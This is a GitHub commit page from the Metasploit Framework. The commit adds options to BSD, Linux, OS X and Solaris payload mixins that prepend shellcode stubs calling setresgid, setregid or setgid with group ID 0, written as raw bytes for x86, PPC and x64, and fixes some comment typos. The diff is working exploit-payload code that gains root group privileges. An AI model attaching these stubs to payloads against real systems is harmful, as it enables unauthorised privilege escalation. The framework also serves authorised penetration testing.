Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Browse files

add PrependSet[re]gid support for unix payloads

  • Loading branch information...
commit 90b948ffb31d83434bf82a40a1dd3276f9431cc0 1 parent 9a0a063
m m authored
View
50 lib/msf/core/payload/bsd.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetresgid',
+ [
+ false,
+ "Prepend a stub that executes the setresgid(0, 0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('AppendExit',
[
false,
@@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x66\xb8\x38\x01" +# movw $0x0138,%ax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x7f" +# movb $0x7f,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xb5" +# movb $0xb5,%al #
+ "\xcd\x80" # int $0x80 #
+ end
# Append
if (datastore['AppendExit'])
View
104 lib/msf/core/payload/linux.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetresgid',
+ [
+ false,
+ "Prepend a stub that executes the setresgid(0, 0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('PrependChrootBreak',
[
false,
@@ -102,6 +123,31 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc9" +# xorl %ecx,%ecx #
+ "\x31\xdb" +# xorl %ebx,%ebx #
+ "\xf7\xe3" +# mull %ebx #
+ "\xb0\xaa" +# movb $0xaa,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc9" +# xorl %ecx,%ecx #
+ "\x31\xdb" +# xorl %ebx,%ebx #
+ "\x6a\x47" +# pushl $0x47 #
+ "\x58" +# popl %eax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xdb" +# xorl %ebx,%ebx #
+ "\x6a\x2e" +# pushl $0x2e #
+ "\x58" +# popl %eax #
+ "\xcd\x80" # int $0x80 #
+ end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
@@ -185,6 +231,33 @@ def generate(*args)
"\x44\xff\xff\x02" # sc #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x3b\xe0\x01\xff" +# li r31,511 #
+ "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
+ "\x7c\x84\x22\x78" +# xor r4,r4,r4 #
+ "\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
+ "\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
+ "\x44\xff\xff\x02" # sc #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x3b\xe0\x01\xff" +# li r31,511 #
+ "\x7c\x84\x22\x78" +# xor r4,r4,r4 #
+ "\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
+ "\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
+ "\x44\xff\xff\x02" # sc #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x3b\xe0\x01\xff" +# li r31,511 #
+ "\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
+ "\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
+ "\x44\xff\xff\x02" # sc #
+ end
+
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
@@ -235,6 +308,33 @@ def generate(*args)
pre << "\x0f\x05" # syscall #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rsi,rdi #
+ pre << "\x6a\x77" # push 0x77 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x48\x89\xfe" # mov rsi,rdi #
+ pre << "\x48\x89\xf2" # mov rdx,rsi #
+ pre << "\x6a\x72" # push 0x72 #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x48\x31\xff" # xor rdi,rdi #
+ pre << "\x6a\x6a" # push 0x6a #
+ pre << "\x58" # pop rax #
+ pre << "\x0f\x05" # syscall #
+ end
+
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
@@ -269,7 +369,7 @@ def generate(*args)
pre << "\x48\x89\xe7" # mov rdi,rsp #
# loop chdir(..) 69 times
- # syscall tendo to modify rcx can't use loop...
+ # syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
@@ -278,7 +378,7 @@ def generate(*args)
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #
- # chrot (.) (witch should by /)
+ # chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #
View
50 lib/msf/core/payload/osx.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetresgid',
+ [
+ false,
+ "Prepend a stub that executes the setresgid(0, 0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('AppendExit',
[
false,
@@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end
+ if (datastore['PrependSetresgid'])
+ # setresgid(0, 0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x66\xb8\x38\x01" +# movw $0x0138,%ax #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x7f" +# movb $0x7f,%al #
+ "\xcd\x80" # int $0x80 #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xb5" +# movb $0xb5,%al #
+ "\xcd\x80" # int $0x80 #
+ end
# Append
if (datastore['AppendExit'])
View
30 lib/msf/core/payload/solaris.rb
@@ -33,6 +33,20 @@ def initialize(info = {})
"false"
]
),
+ Msf::OptBool.new('PrependSetregid',
+ [
+ false,
+ "Prepend a stub that executes the setregid(0, 0) system call",
+ "false"
+ ]
+ ),
+ Msf::OptBool.new('PrependSetgid',
+ [
+ false,
+ "Prepend a stub that executes the setgid(0) system call",
+ "false"
+ ]
+ ),
Msf::OptBool.new('AppendExit',
[
false,
@@ -86,6 +100,22 @@ def generate(*args)
"\xff\xd6" # call *%esi #
end
+ if (datastore['PrependSetregid'])
+ # setregid(0, 0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\x50" +# pushl %eax #
+ "\xb0\xcb" +# movb $0xcb,%al #
+ "\xff\xd6" # call *%esi #
+ end
+
+ if (datastore['PrependSetgid'])
+ # setgid(0)
+ pre << "\x31\xc0" +# xorl %eax,%eax #
+ "\x50" +# pushl %eax #
+ "\xb0\x2e" +# movb $0x2e,%al #
+ "\xff\xd6" # call *%esi #
+ end
# Append
if (datastore['AppendExit'])
Please sign in to comment.
Something went wrong with that request. Please try again.